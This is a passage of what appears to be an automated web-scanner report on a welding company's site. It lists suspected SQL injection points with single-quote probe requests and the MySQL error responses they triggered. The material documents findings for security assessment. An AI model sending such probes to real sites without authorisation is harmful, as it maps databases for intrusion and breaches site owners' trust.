Connection: Keep-Alive
Content-Length: 27726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/pdf/001625sites_QMS.pdf''' at line 1)<br>
...[SNIP]...

1.112. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:47 GMT
Connection: Keep-Alive
Content-Length: 27704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.113. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:50 GMT
Connection: Keep-Alive
Content-Length: 27982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.114. http://www.millerwelds.com/products/accessories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:10 GMT
Connection: Keep-Alive
Content-Length: 17965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:11 GMT
Connection: Keep-Alive
Content-Length: 19672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=ut
...[SNIP]...

1.115. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:56 GMT
Connection: Keep-Alive
Content-Length: 27718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.116. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/international/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:59 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.117. http://www.millerwelds.com/products/accessories/international/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories/international'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:34:01 GMT
Connection: Keep-Alive
Content-Length: 27996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.118. http://www.millerwelds.com/products/accessories/international/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /products/accessories/international/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /products/accessories/international/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:18 GMT
Connection: Keep-Alive
Content-Length: 19560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /products/accessories/international/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/products/accessories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.8.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 21253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=is
...[SNIP]...

1.119. http://www.millerwelds.com/resources/ [REST URL parameter 1]  previous  next

Summary

Severity:&nbs